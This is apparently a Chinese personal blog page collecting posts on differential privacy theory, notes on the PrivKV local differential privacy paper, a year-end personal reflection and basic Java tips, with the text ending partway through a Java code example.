asKylin

Algorithmic Foundation of DP 1

2022-03-31T01:09:49.000Z

一、差分隐私承诺

差分隐私 描述了数据持有者对数据主体的承诺：“无论您将数据用于任何研究或分析，都不会受到不利影响或其他影响。”

1.1 隐私保护数据的分析（存在问题）

数据不能完全匿名并且仍然有用（背景知识）
重标识“匿名”记录并非唯一风险（匿名提供的隐私保护限度不高）
不具有保护性的大数据集查询（差分攻击）
查询审查存在的问题（审核、防止差分攻击语句是不现实的）
“不安全”的摘要统计
普适结论（长期的事实）并不“好”
“少数人”原则（为大多数用户提供隐私保护，而放弃或损害了少数用户的隐私）

二、基本术语

2.1 计算模型

假设存在一个可信的和可信赖的数据提供者，他将个人的数据保存在数据库$D$中，通常由若干$N$行组成。数据库每一行包含单个个体的数据，而隐私目标是同时保护每个个体行，同时允许对整个数据库进行统计分析。

非交互式或离线的模型：数据提供者会一次性地生成某种对象，例如“合成数据库”、“摘要统计数据集合”或“净化数据库（经数据清洗的数据库）”。发布后，数据提供者不再扮演任何角色，原始数据可能会被销毁。

交互式或在线模型：允许数据分析员自适应地询问查询，根据观察到的对先前查询的响应来决定下一个查询的位置。

差分隐私机制是一种算法。

输入：一个数据库或一组全体数据类型 $\mathcal{X}$（所有可能的数据库行）、随机位和一组查询（可选）

输出：字符串。

希望可以对输出字符串进行解码，以便对查询产生相对准确的答案。如果没有出现任何查询，那么我们就处于非交互式的情况下，希望输出字符串可以被解释为将来的查询提供答案。

在某些情况下，我们可能要求输出字符串是合成数据库。这种合成数据库是由所有可能的数据库行（ $\mathcal{X}$）中得到的多集合组成。这种情况下的解码方法是对合成数据库进行查询，然后应用一些简单的变换，如缩放因子的乘法，使其近似于查询的真实答案。

2.2 定义隐私数据分析

隐私：要求分析人员在分析完成后对数据集中的任何个人的了解不超过分析开始前的了解。这一目标的形式化也是很自然的，要求对手对个人的前后认知（即访问数据库之前和之后的认知）不应该“差别过多”，或者对数据库的访问不应该“过多”地改变对手对任何个人的认知。

可用性

2.3 形式化差分隐私

随机响应技术

定义2.1（概率单纯形）给定一个离散集$B$，将$B$上的概率单纯形，表示为$\Delta(B)$ ，其定义为：

$\Delta (B)=\{x\in \mathbb{R}^{|B|}:x_i\geq0\space for\space all \space i\space and \space \sum_{i=1}^{|B|}x_i=1\}$

定义2.2 （随机化算法）具有域$A$和离散范围$B$的随机算法$\mathcal{M}$与映射$M:A \to \Delta(B)$相关联。在输入$a∈A$时，算法$\mathcal{M}$以概率$M(a)_b$输出$\mathcal{M}(a)=b$ $(b∈B)$。概率空间在算法$\mathcal{M}$的硬币翻转上（意思是算法$\mathcal{M}$随机翻转随机串的比特位，形成随机性）。

定义2.3 （数据库之间距离）将数据库的$\ell_1$范数距离表示为$\Vert x\Vert _1$其定义为:

$\Vert x\Vert _1=\sum_{i=1}^{|\mathcal{X}|}|x_i|$

数据库$x$和$y$之间的$\ell_1$距离为$\Vert x-y\Vert _1$。$\Vert x\Vert _1$是衡量数据库$x$的大小（也就是说，数据库$x$包含的记录数），而$\Vert x-y\Vert _1$表示数据库$x$和$y$之间相差多少条记录。我们称这种记录相差为1的数据库为相邻数据集。

注解：数据库$x$视为来自全集$\mathcal{X}$的记录的集合。用它们的直方图表示数据库通常会很方便：$x \in \mathbb{N}^{|\mathcal{X}|}$，其中每个项$x_i$表示数据库$x$中类型$i\in\mathcal{X}$元素的数量。

定义2.4 （差分隐私）对于所有的$\mathcal{S} \subseteq Range(\mathcal{M})$且所有的$x,y\in \mathbb{N}^{|\mathcal{X}|}$有$\Vert x-y\Vert _1 \leq 1$，如果满足下列关系：

$Pr[\mathcal{M}(x)\in \mathcal{S}] \leq exp(\varepsilon)Pr[\mathcal{M}(y)\in \mathcal{S}]+\delta$

则将这个域在$\mathbb{N}^{|\mathcal{X}|}$的随机算法$\mathcal{M}$称为$(\varepsilon,\delta)$差分隐私（ $(\varepsilon,\delta)$- Differentially private）。其中概率空间在算法$\mathcal{M}$的硬币翻转上。特别的，如果$\delta=0$，则将$\mathcal{M}$称为$\varepsilon$差分隐私(即$\varepsilon \text{-} Differentially \ private$)。

机制质量（隐私损失）：

$\mathcal{L}_{\mathcal{M}(x)||\mathcal{M}(y)}^{(\xi)}=ln(\frac{Pr[\mathcal{M}(x)=\xi]}{Pr[\mathcal{M}(y)=\xi]})$

$(\varepsilon,\delta)$差分隐私确保对于所有相邻的$x$、$y$，隐私损失的绝对值小于等于$\varepsilon$的概率至少为$1-\delta$。

命题 2.1 （后处理）令$\mathcal{M}: \mathbb{N}^{|\mathcal{X}|} \to R$是$(\varepsilon,\delta)$- 差分隐私随机算法。令$f:R \to R’$为任意随机映射。则$f \circ \mathcal{M}: \mathbb{N}^{|\mathcal{X}|} \to R’$是$(\varepsilon,\delta)$- 差分隐私。

定理2.2 任意一个大小为$k$的群体，这个群体的机制$\mathcal{M}$是$(\varepsilon,0)$- 差分隐私，则这个机制$\mathcal{M}$会变成 $(k\varepsilon,0)$- 差分隐私。也就是说，对于所有$\Vert x-y\Vert _1 \leq k$和所有$\mathcal{S} \subseteq Range(\mathcal{M})$有:

$Pr[\mathcal{M}(x)\in\mathcal{S}]\leq exp(k\varepsilon)Pr[\mathcal{M}(y)\in\mathcal{S}]$

概率空间在机制$\mathcal{M}$的硬币翻转上。

（个人理解：群体是由多个不同类型数据集组合形成的，群隐私是指一个隐私保护机制（查询）应用于相差多条记录的两个数据集上，对所有的这些数据集都采用机制$\mathcal{M}$，则机制$\mathcal{M}$会变成 $(k\varepsilon,0)$- 差分隐私。但群隐私与隐私参数合成相加定理不同，若$\delta\neq 0$，则大小为$k$的群体是$(k\varepsilon,ke^{(k-1)\varepsilon}\delta)$-差分隐私。合成定理可以理解为对一个数据集采用多次具有差分隐私的机制，这样得到的新机制可以参数相加）

恒与变

2021-12-31T09:41:51.000Z

此时是2021年12月31日17点20分，是在上完最后一节机器学习和等待最后一节网络与系统安全课程的时间间隔里，开始总结这一年。
国科大的期末，有人已经准备放假，而有人还在马不停蹄的准备考试。而在忙碌的日子里，我还是强制让自己停下脚步，以表达对这一年的敬意。
上半年，大四下学期如期开学，我到学校，见到守一，他第一句话就是：“你不是说这学期不来了吗？”是啊，我也本以为大四的最后一学期会在信工所里渡过，然后毕业时才会回到学校参加个毕业典礼走个过场。但到了这最后的一学期，情绪总是会变得想要更加珍惜，总还是想和大家一起结束。于是我依然选择回到学校。现在来看，我很庆幸这半学期能够和大家一起过最后的分别。
最后的这一学期，毕业设计虽然是一件重要的事情，但它不是我生活的主要组成了。我在大学的最后半年里决定体验自己想要体验的大学生活。和室友一起KTV，旅游，聚餐，一起侃天侃地。但欢乐的时光总是短暂的，毕业和分别的情绪总是参杂在日常的生活中。而一瞬间，似乎就到了毕业季。
学院组织的毕业季，其实就是大家一起穿上好看的衣装，将自己打扮成满意的模样，然后合影以及和教过我们的老师们做交流和道别罢了。在我感性的记忆中，它是充满夏日午后阳光的颜色，是停机坪青草的味道。待到拿到毕业证书那一天，许多同学都分享了毕业的动态，为了稍显仪式感和纪念性，我也一样。只是当时感觉多了几分毕业的伤感，心里又想着永远停留在这个时光多好。
6月，这是毕业前与毕业时的故事，大都是与我的室友们一起度过的回忆。毕业当天，我们收拾好行李，一起开启了毕业旅行。关于这场旅行，我已做好了毕业Vlog，永远保存在我的电脑上，记忆里。此时的颜色，是最绚烂的彩色，充斥着我的世界。
但绚烂的美好总如流星般划过，毕业旅行结束后没几天，就开始了研究生的生活——到研究所实习。整个暑假一个人在北京度过。独自在异乡，每天重复着同样的路程，在地铁上，走在北京的路上，心情的颜色总是多变的，但总是蒙上了一层灰色。
9月，开学。开始新的生活，新的室友，新的老师，新的忙碌。这几个月，我觉得都是白色的，简单、复杂、无趣、有趣。

关于未来
希望2022能找到自己的研究idea，尽早进行研究和论文工作。同时而也希望遇到未来那个她吧！

Basic Differential Privacy

2021-10-21T00:34:01.000Z

本篇文章主要是面向对差分隐私零基础的朋友，我在介绍差分隐私相关的基础知识时尽可能地用简单的语言去讲解，因此准确性和严格性可能不太高，已经熟悉差分隐私的大佬们可以忽略该文章，也欢迎提出意见和建议！

一个例子

差分隐私是什么？我们为什么关注差分隐私？这里以一个例子来简单理解下：大家应该都知道QQ群中有群成员概况，可以显示群成员在全国各省市的分布数量、男女比例和具体人数，甚至还有单身数量的统计（这个现在的版本好像不会显示了）。假设张三在某一个QQ群中，平时就喜欢查看成员概况，然后某一天，你加入了这个群，张三看到群成员概况里面，男生或者女生人数突然增加了1，海淀区和90后人数增加了1人，还发现居然单身的人数又多了一个，然后一看群，发现你加进群了，于是对他来说，奇怪的知识又增加了，原来你是一只单身狗。但对于你来说，你也许并不想让你单身的信息被别人知道，但因为上面发生的情况，你的信息就无意识的被暴露了。那为了避免这种事情的发生，有什么办法呢？差分隐私就应运而生了。它就是用来解决这类问题，让攻击者不会因为新样本的出现而推测到新的信息。

差分隐私的定义

对于随机函数$M$，$P_m$是$M$的所有可能的输出结果的集合，$Pr[\cdot]$表示概率，对于任意两个只相差一项纪录的数据集，即相邻数据集$D$和$D’$，$P_m$的任意子集$S_m$，算法$M$满足：

$Pr[M(D)\in S_m]\leq e^{\epsilon}Pr[M(D')\in S_m]$

那么就说明该函数提供$\epsilon-$差分隐私保护。

我觉得应该不止我一个人第一次看到这个数学定义会感觉有点懵吧，用人类能听懂的话和这个图来理解，就是两个相差一条记录的数据集，随机函数看作查询函数，对这两个数据集进行查询，然后我们把查询结果映射到概率分布上，这两条曲线就是查询结果映射后的概率分布曲线。如果两次结果的概率分布非常接近，那么就说它满足$\epsilon-$差分隐私保护。这个接近的程度是由这个$\epsilon$决定的，我们称之为隐私预算。由定义的不等式可以看出，隐私预算越小，分布越接近，保护程度越大，但反过来想，要使分布越接近，那么势必会引入较大噪声，数据精度会受到更大的影响。

就刚刚张三那个例子而言，你加入群前，张三看到这个单身人数是56个，你加进去之后，张三看到的单身人数还可能是56个，这样就保护了你单身这个个人隐私。定义里面的数学不等式，是以两个$D$和$D’$分布尽可能的接近为目的来计算得到的，利用了信息论中的KL散度和Max散度推导而来。感兴趣的同学可以自行深入了解。

那么关于这个定义，还有最后一个问题就是，为什么$\epsilon$被称为隐私预算呢？既然被称为预算，那么就说明差分隐私保护是会被消耗的，我们来简单的理解一下：我们知道查询结果是一个概率分布了，那作为攻击者来说，我可以不断地进行同一个查询，如果查询次数足够多的话，攻击者可以猜到结果的概率分布，进而推测出准确值，那么说明丧失了隐私保护能力了。那么每一次查询都可以看作消耗了$\epsilon$的隐私保护，我们固定一个总的能被允许的消耗，而$\epsilon$越小，那么表示会有更多次查询才会使隐私保护能力丧失。这里也可以看出差分隐私保护也许和我们日常理解的隐私保护不同，它是有限制的，会被消耗的，不是一旦使用了差分隐私保护机制就能够永久保护隐私的。

从定义就可以看出，差分隐私能够防止攻击者拥有大量背景知识进而推测出隐私信息，同时其建立在严格的数学定义上，提供了可量化评估的方法。

性质

差分隐私还有一些有趣的性质：串行组合、并行组合、变换不变、中凸；

其中串行组合的意思就是如果k个差分隐私保护算法同时作用于同一个数据集，那么最终的隐私预算就等价于这k个算法的预算和；这也很好理解，假设第一次加噪声处理后有$\epsilon$的预算了，第二次的时候又进行了一次差分隐私保护处理，又添加了噪声，那么噪声就更大了，那么隐私预算也应该相应的增加。

并行组合就是多个算法分别作用在同一个数据集上的多个子集上，最终隐私预算等价于这些算法中隐私预算最大的一个。

变换不变：对于任意算法A1满足ε-差分隐私，对于任意算法A2，有A(·)=A2(A1(·))满足ε-差分隐私。

中凸：两个算法都满足ε-差分隐私，这两个算法分别以p和1-p的概率使用，构成一个机制，则该机制满足ε-差分隐私。

常见机制

Laplace机制（针对数值型数据）和指数机制（针对离散性数据），其核心思想就是对查询结果添加适量扰动、噪声，来满足差分隐私保护。其中，对加入噪声进行的度量由敏感度来决定，敏感度指数据集中删除任意一条记录对查询结果产生的最大影响：

$\Delta f = \max_{D,D'}||f(D)-f(D')||_1$

敏感度又分为：

全局敏感度：核心是对于查询函数的作用域上，任意相邻数据集删除任意一条记录对查询结果产生的最大影响。只与查询函数本身有关。
局部敏感度：对于给定的相邻数据集，删除任意一条记录对查询结果产生的最大影响。与查询函数本身和选定的数据集有关

敏感度越大，所需要加入的噪声也就越大。

Laplace机制

Laplace机制如下公式所示，其中，f(D)表示的是查询函数，表示的是满足Laplace分布的随机噪声， M(D)表示的是最后的返回结果。

$\mathcal{M}=f(D)+\text{Lap}(\frac{\Delta f}{\varepsilon})$

特点：适合数值型数据，ε越小，添加的噪声越大。

指数机制

以

$M(D,q,R_i)\sim e^{\frac{\varepsilon q(D,R_i)}{2\Delta q}}$

的概率输出结果$R_i$。其中$q$表示一个打分函数，$D$表示数据集，$R_i$表示一个输出结果，这个函数的意思就是对$D$的输出结果打分。得分高的输出概率高，得分低的输出概率低。

PaperRecord - PrivKV

2021-09-24T11:22:56.000Z

摘要

LDP优势：数据收集者不用访问敏感数据而收集到精确的统计估计。

论文主要工作：

设计了一个基线方法PrivKV;
PrivKVM和PrivKVM+两个迭代方案去提高估计精度；
一个优化策略来减少网络延迟和提高精度；
验证以上方案的正确性和效率

Introduction

论文工作内容概述：

Local perturbation protocol (LPP) 扰动key-value对；
三个基于LPP的方案：PrivKV，PrivKVM，PrivKVM+；
一个优化策略让数据收集者执行虚拟PrivKV迭代，减少网络延迟和提高数据精度

LDP可用于：

分类数据上的频率估计；
用频率估计作为保护数据隐私的原语；
数值型数据的均值估计；

Preliminaries and Problem Definition

A. 本地化差分隐私（LDP）

LDP的基本流程：数据拥有者在本地使用随机机制扰动数据$\rightarrow$传递这个”消毒“版本数据给不受信任的数据收集者中。

定义1 $\epsilon-LDP$：$D$表示整个数据集，一个随机化函数$\mathcal{M}$满足$\epsilon-LDP$，当且仅当任意两个输入数据元组$t,t’\in D$和任意输出$t^*$，以下不等式始终成立。

$Pr[\mathcal{M}(t)=t^*]\le e^{\epsilon}\times Pr[\mathcal{M}(t')=t^*]$

与中心化差分隐私定义在两个相邻数据集不同，$\epsilon-LDP$是定义在一个数据集的两个数据元组上，可以直观的理解为通过观察输出$t^*$，数据收集者不能通过高置信度（由$\epsilon$控制）推断出输入元组是$t$或是$t’$

满足顺序合成性（Sequential Composition）

第五节中的迭代解决方案，利用了顺序合成性，给定一个隐私预算$\epsilon$，可以将其分为多个部分，每一个预算都可以被用于一个随机算法来从源数据中收集可用信息。

B. 随机响应（RR）

随机回答一些敏感的布尔问题来实现看似可信的否认能力。一般回答真实答案的概率为$p$，回答对立答案的概率为$1-p$。

为使RR满足$\epsilon-LDP$，设置$p$为$p=\frac{e^{\epsilon}}{1+e^{\epsilon}}$，但“真”的概率（表示为$f$）是直接从所有被扰动后存在偏差的回答中获取的，所以数据收集者需要校准并报告$f’$：

$f'=\frac{p-1+f}{2p-1}$

C. 问题定义

LDP背景下key-value数据上的分布式数据聚合问题

论文关注与两个基本估计：

频率估计：密钥$k$的频率$f_k$定义为拥有密钥为$k$的$KV$对的用户部分占总用户的比例。
均值估计：键$k$的均值$m_k$定义为键为$k$的$KV$对中所有值的均值。

PRIVKV: A BASELINE APPROACH

基线方法PrivKV通过对key和value添加扰动来保护key-value数据，同时几乎保留真实的频率和均值。

A. 有缺陷的键扰动协议

首先转化$KV$对集合，将键转化为$\{0,1\}$上的整数值，1表示存在KV对，0表示不存在KV对：

对键$k$直接使用RR，对值的更改基于对键的扰动，有以下四种情况：

$1\rightarrow1$：保留原值$\langle1,v\rangle\rightarrow\langle1,v\rangle$
$1\rightarrow0$：值置为0$\langle1,v\rangle\rightarrow\langle0,0\rangle$
$0\rightarrow0$：KV对不存在，也就不存在改变$\langle0,0\rangle\rightarrow\langle0,0\rangle$
$0\rightarrow1$：新形成的KV对，值随机从$\{-1,1\}$之间取

其缺陷在于第四种情况：首先，随着数据者接收到更多的真值，她能够以高置信度区分真值（情况1）和指定的值（情况4），特别是当真值的分布明显与$[-1,1]$上的均匀分布偏离时。其次，[−1, 1] 的均匀分布导致均值为 0，这会影响该键的均值估计。

B. 本地扰动协议：补救措施

一种补救措施：无论是真实值还是指定值，任何值都添加干扰。

Harmony算法：离散、扰动、校准

原始的值扰动算法：基于Harmony，将校准步骤移至数据收集者方，设置数据收集者能够精确地对键计数并求和值来计算均值，在校准后添加条件校正（eg：假设总共有对-1和1的计数，若），去除由Harmony引起的异常值。

组合键扰动协议和原始值扰动算法得到本地扰动协议（LPP）：

LPP满足$(\epsilon_1+\epsilon_2)-LDP$

C. PrivKV：把事情结合起来

PrivKV对频率和均值的完整方案，包含用户端的扰动和收集者端的校准。

论文将任何大于N或小于0的计数视为异常值，并修正他们分别为N和0。

1
2
3

对于频率和均值为什么几乎一致?
键的频率校准是通过极大似然估计求得，所以频率几乎一致。
用户扰动后离散值{-1，1}的计数实际上也是通过极大似然估计校正，这里离散值的形成和原值的构成的概率相关，举个例子，原值0.1，总共100个，离散后有55个1，45个-1，求均值还是0.1，所以这里均值相似。

PrivKVM: AN ITERATIVE SOLUTION

PrivKV存在的问题：PrivKV以不当分配新值来保证LDP

PrivKVM和PrivKVM+的做法：多次迭代PrivKV让分配的新值所在的分布基本与真实值相同。

A. 一个迭代模型

前一个$v^*$的离散化估计均值作为下一个迭代的分配值。迭代模型如图：

为防止步骤六中$\tilde{m}$被泄露给用户，数据收集者不会直接将其回传给用户，而是通过当前迭代返回一个新的且独立的样例值$v^*$，该值是$\tilde{m}$的离散化值，它分别以$\frac{1+\tilde{m}}{2}$和$\frac{1-\tilde{m}}{2}$的概率被设置为1或-1。由于这两种概率仅为数据收集者所知，任何用户都无法推断$\tilde{m}$，除非大量用户串通并共享其接收到的1和-1。在这种极端情况下，保护$\tilde{m}$不再是必要的，因为这些用户可以自己推导出来。

数学上可证明：算法的求得的均值$\tilde{m}_k^*$是真实的$m_k$的近似解。核心思想就是如果数据收集者返回的估计均值，基于这个值对所有原始数据的估计就可以估计出key的对应的均值，并且估计是无偏估计。

对于迭代模型中的步骤5、7，可以设计基于先验知识的异常值校正方案：

数据收集者记录上一次迭代的估计平均值。在随后的迭代中，所有出现的异常值都将被这些记录的平均值所取代。这种校正方案也有助于提高迭代模型的精度。

B. PrivKVM

该算法如下所示，需要注意的是隐私预算$\epsilon$通过隐私预算分配策略（PBA）被分为$\{\epsilon_{11},…,\epsilon_{1c},\epsilon_{21},…\epsilon_{2c}\}$，PBA有线性分配、均匀分配、指数分配、自适用性分配以及混合分配等，通过分析敏感度等方面，分配合适的隐私预算。

其中在本地差分隐私中$v^*$用于原本不存在的键被扰动成键为1时，其值的取值。

论文的PBA类似于均匀分配：首先平均分配隐私预算$\epsilon$用于keys和values，比如$\epsilon_1=\epsilon_2=\frac{\epsilon}{2}$。在迭代中，只需要第一次的key作为输出，因此$\epsilon_{11}=\epsilon_1$，且$\epsilon_{12},…,\epsilon_{1c}=0$；对于均值估计，将$\epsilon_2$平均分配给每一次迭代。

1	对于键，是否需要这么大的隐私预算？该方案中的PBA是否合理？（论文是否有阐述为什么采取该PBA）

对于多维数据，PrivKVM拓展直观。对于键，直接展开到键域上成为一维；对于值，对每一维度的值分别单独扰动。不会损失键和每一维值的相关性。

PrivKVM还可以用于中位数和百分比统计。中位数利用频率表，分成两个面积相等的区域，中间的即为中位数。为了提高估计精度并减少对均匀假设的依赖，论文通过在频率直方图中使用多个 bin 来进一步推广这个想法。

PrivKVM适用于：归档数据集收集、历史数据。真实时间数据不太适合。

多次迭代会增加数据收集的响应时间（影响数据收集效率）。只要键或值分布没有改变，PrivKVM 仍然可以处理迭代之间的键值数据变化。

C. 隐私和准确性分析

PrivKVM满足$\epsilon-LDP$（根据顺序合成性质）

PrivKVM的真实均值与估计均值的期望值之差收敛为零。

PrivKVM在最坏情况下，真实均值与估计均值的差值是有界

D. PrivKVM+：一个自适应变种

PrivKVM需要迭代$c$次，但这个次数很难确定。理论情况下，$c$无穷大时，精确度最好，但通信和执行时间会巨大。因此提出PrivKVM+取根据消耗（通信、执行时间等）自适应的决定$c$的值。

论文定义了一个开销函数$F(r)=F_1(r)+F_2(r)$，其中$F_1(r)$是准确率开销、$F_2(r)$是通信开销（由于执行时间由通信带宽决定，论文将执行时间成本合并到通信成本中）。

$F_1(r)$通过所有键的均值的绝对误差的平均值计算：

$F_1(r)=\frac{1}{d}\sum_{k\in\mathcal{K}}|m_k-m_k^{(r)}|$

因为每次通信的开销是一个常数值，所以有：

$F_2(r)=A_0\cdot r$

当迭代次数$r$增大，$F_1(r)$减少并且相对越来越不重要，而$F_2(r)$以恒定比例$A_0$增长。因此，当$F_1(r)$的减少不能再补偿$A_0$的增加时，$F(r)$达到全局最小值。当第一个$F(r)-F(r-1)=A_0-\frac{1}d\sum_{k\in\mathcal{K}}|m_k^{(r)}-m_k^{(r-1)}|\geq0$时，也就是说第一次出现第$r$轮迭代产生的开销大于第$r-1$时，就选取迭代次数为$r$，此时的总体开销最小。（论文未严格证明，只是上式很容易被算法实现）

PrivKVM+算法在隐私预算分配时，使用PBAt策略，该策略使用了“指数衰减”策略（$t=a(1-b)^x$）动态地将剩余的隐私预算的$\frac{1}t$分配给当前迭代（这样一开始的t比较大，然后逐渐变小，也就是说一开始分配的隐私预算小，收敛慢，到后面分配的隐私预算越来越大，估计逐渐收敛，这样会比较精确。但文章中没有说明初始t值的选取，该值的估计个人认为又是一个待研究的问题）。t 可以是任何大于1的值。t越小，分配给当前迭代的隐私预算就越大，估计收敛得更快。但如果t太接近1，则收敛可能会过早，因为大多数隐私预算都浪费在早期迭代中，其中估计的均值对于下一次迭代来说就十分不准确了。

第2步与LPP算法不太一样，这里是直接设置一个初始$\tilde{m}=1$，论文没有说明具体这样做的理由。

VIRTUAL ITERATIONS: AN OPTIMIZATION ON LATENCY AND ACCURACY

优化策略的简单理解：选择一些迭代进行真的在用户方进行计算，其余的迭代过程全在数据收集者处完成。

优点：原本的算法需要每次计算出均值然后让用户再来根据数据收集者计算的均值回馈，然后迭代计算。这样用户需要频繁计算和通信。优化策略就只要从用户那里收集一次数据，后面的c−1轮迭代，可以自己完成，这里称为虚拟迭代（Virtual Iterations）。这样能有效地降低用户和收集器之间的网络传输开销，从而提高了延迟；其次，由于虚拟迭代不会花费任何隐私预算，因此可以为真实迭代分配更多的隐私预算，从而提高估计精度。

算法中的重要的点在于计算$\theta$和预测第$c$次迭代的均值$m_k^{(c)}$。

证明过程利用了真实均值与估计均值的期望值之差收敛为零这个性质。

证明利用的性质是基于完整的迭代过程去逆推每一次迭代的均值的期望，以最优的期望取预测每一次的均值，所以如果迭代次数很多时，在虚拟迭代会放大真实迭代的效果（相当于迭代了更多次）

论文中说明虚拟迭代的精度增益很大程度上取决于第一次迭代的精度。然而，如果后者只被给予很小的隐私预算，例如 = 0.05，则在第一次迭代中引入的压倒性噪声可能会通过虚拟迭代进一步累积。（由此也可以看出如果要使用优化策略,无论是PrivKVM还是PrivKVM+，都需要考虑隐私分配策略是否合理）正如将在性能评估中显示的那样，除非隐私预算很小，否则这种优化策略可以很好地工作。

EXPERIMENTAL EVALUATION

在实验评估中，分别对key的频率估计和value的均值估计进行了对比实验：

对于keys：与RAPPOR，k-RR，和SHist进行比较（使用与论文方案相同的采样技术）；
对于values：将PrivKVM-Harmony和PrivKVM-MeanEst与PrivKVM进行对比

因为进行对比的方案有的只能处理分类（key）或数值型（value），为了公平，实验尽可能的调节这些方案使其能够适应key-value背景下的数据。

数据集采取了6个数据集：

前三个是合成数据集，分别满足高斯、幂律、线性分布，后三个是采样的实际的公共数据资源。

论文采用了相对误差（RE）和均方误差（MSE）取对数进行评估的计数。

A. 总体结果

从总体来看，PrivKVM在均值估计上比其他两个方案更加精确，特别是在隐私预算较小和真实数据集上。隐私预算较小时较好是因为小的隐私预算会导致高的扰动，因此导致更多的异常值，而PrivKVM有对异常值做校正，所以会比较有优势；对于真实数据，是因为异常值在真实数据集（KV对非常稀疏）中更容易出现。论文提到图中（d）（e）（f）的均方误差的绝对值要普遍高于前三个，是因为样本数据量要少于前者。

对于频率估计，在不同隐私预算下，PrivKVM在PLAW数据集上的相对误差都优于另三种，在Appdata数据集上，因为采样数据集是非常稀疏的，因此键是非常嘈杂且无意义，论文只绘制了前100个键的的频率估计下的相对误差，即使在此情况下，PrivKVM依然是最优。

比较端到端宽带开销，论文展示了在用户和数据收集者间传输Appdata的比特位数（不太明白为什么会是图示大小，PrivKVM是PrivKV的9倍，因为第一次是从用户打给数据收集器端。）：

B. 可拓展性

这里可拓展性是指用户数量或键空间尺寸对数据的频率和均值估计的影响程度。这里其实意思就是，虽然大家都知道对于同一个方法数据越多越准确，但是同样的数据下，你的方法比别人准确就是你厉害了。下图展示了不同用户数量下的误差，可以看出论文的方案均优于对比方案

对于键空间尺寸而言，从下图中也可以看出其对频率和均值的估计的影响都优于其他算法，这里随着键数量增加误差增大的原因是，用户数固定，如果其键空间尺寸增多，那么对于每一类键，它的数量是减少的，所以导致了误差增大。

C. key-value的相关性

使用了Pearson相关系数（？）作为度量并在PLAW和LNR上进行测试。从下图可以看出，隐私预算较大的情况下，PrivKVM处理后的KV对的相关性接近原KV对，而k-RR处理键结合Harmony处理值的这一方案，键值对的相关性基本被消除了。

为了进一步说明不同频率的键之间键值相关性的保留情况，在高斯分布的数据集上绘制了键和均值的三维图，如下图所示，可以清楚的看出PrivKVM处理后保留了一定的相关性。

D. 迭代的影响

论文评估了PrivKVM中的迭代对均值估计精度的影响。下图显示了在GAUSS和PLAW上的结果。对于每个隐私预算，论文尝试10次PrivKVM运行，迭代次数从1到10不等。可以看出，在合成数据集中，$Log(MSE)$随着迭代次数的增加而减小并收敛到某个值。这个值完全是由于值扰动引起的，因为论文已经证明预期和实际均值之间的绝对误差会收敛到零。

然后还比较了其他方案进行迭代后的均方误差，PrivKVM-Harmony的均方误差其实与PrivKVM差不多，PrivKVM-MeanEst的均方误差基本不变，因为这个方案只适用于域仅有几个键组成的情况。同样的，在隐私预算较小的情况下优势更明显。

E. 开销函数的影响

从图中可以看出当通信开销的系数为$A_0=0.2$时，迭代6次比迭代3次开销大，系数比较小的时候（$A_0=0.02$）第3次的开销大于第6次，由于PrivKVM+是寻找合适的迭代次数来实现最低成本，由论文的论述，可以知道前者可能迭代2，3次，后者则可能是4 5 6次迭代。

F. 虚拟迭代优化的影响

实验对比了使用虚拟迭代和不使用虚拟迭代策略的情况，对于前者，我们将要执行的迭代次数$c$设置为 6，这意味着在涉及用户的第一次真正迭代之后将执行 5 次虚拟迭代。不使用虚拟迭代的迭代次数设置为 6。下图显示了在 GAUSS 和 PLAW 上的结果。

可以看出观察到，当隐私预算非常小时，PrivKVM 返回的结果非常不准确。这是因为虚拟迭代的效果在很大程度上取决于第一次真实迭代的准确性，当预算太小时，这是很糟糕的。当预算增加时，PrivKVM 的准确性提高得很快，就超过了 PrivKVM-noV I。表明虚拟迭代可以放大真实迭代的效果，无论它是好是坏。

CONCLUSION

论文设计了一个基于LDP的key-value数据的频率和均值估计的去中心化的隐私保护机制，其提出了三个基于本地扰动协议的方案PrivKV、PrivKVM和PrivKVM+。还提出了虚拟迭代优化策略。并对以上进行了理论和实验分析。

未来的研究：论文计划研究更多关于键值数据的聚合统计，例如最大值和最小值估计。我们还计划探索 LDP 用于隐私保护挖掘任务（例如，查找梯度下降或 k 均值聚类），并将这项工作扩展到具有关系依赖关系的查询（例如，自然连接）和未知的关键空间。

可能存在的问题

首先该算法的离散化处理，将value二元化，这样对于数据集的统计操作的局限性就很大，就基本只能做做均值、频率、中位数，而做不了有梯度的统计或者是统计最大值或者最小值之类的。

同样，因为它是离散到二元的，那么如果数据量不够大误差是会很大的，论文也没有方案讨论适用于什么数量级的情况。

然后就是PrivKVM+自适应确定迭代次数，文章中没有说明初始t值应该如何选取，才能使该方案有较好的效果，该值的估计个人认为又是一个待研究的问题。

在虚拟迭代中，初始化均值取值算法不同于LPP，他是直接取1，论文同样没有阐述为什么这样做，而且虚拟迭代的精度很大程度取决于第一次迭代均值的精度，这一点又与隐私预算分配相关，如果给太多，虽然第一次精度有一定保证，但迭代收敛过快，还是可能造成精度损失大；若给太少，迭代收敛慢，但第一次精度不足，同样会导致精度问题。论文没有给出具体应该如何确定第一次迭代的精度的检测方案，也没有给出该如何得到较优的第一次迭代的均值。

PrivKVM算法的真实均值和估计均值的最大差异部分没有太明白，还需要看参考文献中的证明。

Java Tips

2021-01-17T06:38:09.000Z

大数值

BigInteger和BigDecimal

字符串

String类对象为不可变字符串，不能直接使用下标修改字符串的某个位置，而是需要提取、拼接来修改
char：一般不使用char
==：不使用==进行字符串间的比较，比较字符串是否相等使用equls()或者compareTo()
StringBuilder Class：适用于使用多个小段字符串构建一个字符串。使用append()方法添加，在使用toString()方法构建出字符串

I/O

Scanner Class：通过与标准输入流System.in关联，通过控制台输入(输入是可见的)

Scanner in = new Scanner(System.in);
//输入一行
in.nextLine();
//输入一个不含空格的字符串
in.next();
//输入整数
in.nextInt();

Console Class：适用于在控制台输入密码（不显示明文）
1
2
Console cons = System.console();
char[] passwd = cons.readPassword("Password: ");
为了安全起见，在对密码进行处理之后，应该马上用一个填充值覆盖数组元素
文件读写：使用例如Scanner in = new Scanner(Paths.get("myfile.txt"), "UTF-8");创建一个读取文件的对象（读取的文件必须存在）；使用例如PrintWriter out = new PrintWriter("myfile.txt", "UTF-8");创建一个写文件的对象（若文件不存在则创建，文件名必须是可被创建的）

控制流程

块作用域：不能在内层命名空间（作用域）重复定义、声明外层代码块的同名变量

带标签break：设置标签，跳出语句块，跳转到带标签的语句块末尾

label:
{
...
if(condition) break label; //exit block
...
}
//jumps here when the break statement executes

for each：依次处理数组中的每一个元素（或实现了Iterable接口的类对象）
1
for (variable : collection) statement;
若要遍历二维数组，则需要两层for each：
1
2
3
4
5
for (double[] row : a) {
for (double value : row) {
